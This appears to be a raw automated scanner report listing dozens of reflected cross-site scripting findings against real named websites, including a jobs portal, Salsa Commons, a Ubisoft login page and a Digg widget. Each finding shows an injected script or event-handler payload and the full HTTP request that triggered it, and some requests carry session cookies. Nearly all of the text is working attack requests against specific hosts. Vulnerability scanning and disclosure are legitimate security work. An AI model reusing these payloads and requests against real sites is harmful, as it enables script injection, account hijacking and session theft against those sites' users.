The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f was submitted in the REST URL parameter 5. This input was echoed as d066f"><img src=a onerror=alert(1)>a7f78c0cf8f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/jsd066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f/jquery.filestyle.mini.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22 was submitted in the REST URL parameter 6. This input was echoed as d5178"><img src=a onerror=alert(1)>0973140bc22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/jquery.filestyle.mini.jsd5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a was submitted in the REST URL parameter 1. This input was echoed as 30ba9"><img src=a onerror=alert(1)>805a34d1d8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a/all/themes/threesixty/js/swfobject.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0 was submitted in the REST URL parameter 2. This input was echoed as ccd50"><img src=a onerror=alert(1)>4aae54469d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0/themes/threesixty/js/swfobject.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d was submitted in the REST URL parameter 3. This input was echoed as 40040"><img src=a onerror=alert(1)>74cc53efc7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d/threesixty/js/swfobject.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5 was submitted in the REST URL parameter 4. This input was echoed as 50274"><img src=a onerror=alert(1)>beb612c26a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5/js/swfobject.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2 was submitted in the REST URL parameter 5. This input was echoed as 2ed8c"><img src=a onerror=alert(1)>e9fc30c79e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2/swfobject.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6 was submitted in the REST URL parameter 6. This input was echoed as 8edfa"><img src=a onerror=alert(1)>6de297366e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/swfobject.js8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58 was submitted in the REST URL parameter 1. This input was echoed as ad216"><img src=a onerror=alert(1)>a10ddffaa58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58/default/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f was submitted in the REST URL parameter 2. This input was echoed as f18ea"><img src=a onerror=alert(1)>393e7302d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/defaultf18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0 was submitted in the REST URL parameter 3. This input was echoed as 9ef90"><img src=a onerror=alert(1)>15718a32de0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0/blogger/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7 was submitted in the REST URL parameter 4. This input was echoed as e0192"><img src=a onerror=alert(1)>5cdb37c2fc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/bloggere0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0 was submitted in the REST URL parameter 5. This input was echoed as 279d9"><img src=a onerror=alert(1)>8079457cfc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/blogger/Michael_0.jpg279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315 was submitted in the REST URL parameter 1. This input was echoed as a1d31"><img src=a onerror=alert(1)>5fcd56ff315 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesa1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315/default/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029 was submitted in the REST URL parameter 2. This input was echoed as 5595f"><img src=a onerror=alert(1)>ef72e250029 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5 was submitted in the REST URL parameter 3. This input was echoed as ca239"><img src=a onerror=alert(1)>355951df0a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/filesca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5/blogger/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0 was submitted in the REST URL parameter 4. This input was echoed as 13886"><img src=a onerror=alert(1)>61979da1bf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/blogger13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab was submitted in the REST URL parameter 5. This input was echoed as 2e68b"><img src=a onerror=alert(1)>5d1d857a6ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/blogger/Wendy_0.jpg2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d was submitted in the REST URL parameter 1. This input was echoed as 4549d"><img src=a onerror=alert(1)>a96526d001d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /we-promise4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; has_js=1; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e0625<script>alert(1)</script>bfb396fceb was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66456"-alert(1)-"9f81cfc7a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o66456"-alert(1)-"9f81cfc7a30/8001/p/salsa/commons/img/favicon.ico HTTP/1.1 Host: salsacommons.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... "text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7c4"-alert(1)-"e91fbaea79c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p3f7c4"-alert(1)-"e91fbaea79c/salsa/commons/img/favicon.ico HTTP/1.1 Host: salsacommons.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... avascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64410"-alert(1)-"1c986b6dd8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p/salsa/commons/img/favicon.ico64410"-alert(1)-"1c986b6dd8 HTTP/1.1 Host: salsacommons.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the NextURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d was submitted in the NextURL parameter. This input was echoed as fd14d"style="x:expression(alert(1))"74425cf103d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /register/CreateAccount.aspx?genomeId=c970157e-c24d-44f3-aba7-819b852e0e02&NextURL=999895'()973289fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d&lang=en-US HTTP/1.1 Host: secure.ubi.com Connection: keep-alive Referer: https://secure.ubi.com/register/login.aspx?genomeId=C970157E-C24D-44F3-ABA7-819B852E0E02&lang=en-US&NextUrl=999895%27%28%29973289 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=101287877.1303486155.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id=A8CC6CF1-F210-440C-B57B-E6567568B947; utsver=30053; ubisession=1976650102; __utma=101287877.1723011522.1303486155.1303486155.1303486155.1; __utmc=101287877; __utmb=101287877.2.10.1303486155; ASP.NET_SessionId=hyemfw450y0nxlb4z35rg2eu
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 168d7<script>alert(1)</script>c3e46dbbdc1 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/22/html/dork/xss-reflected-cwe79-secure.ubi.com_443.htm168d7<script>alert(1)</script>c3e46dbbdc1 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ef4"><script>alert(1)</script>42d3138b490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
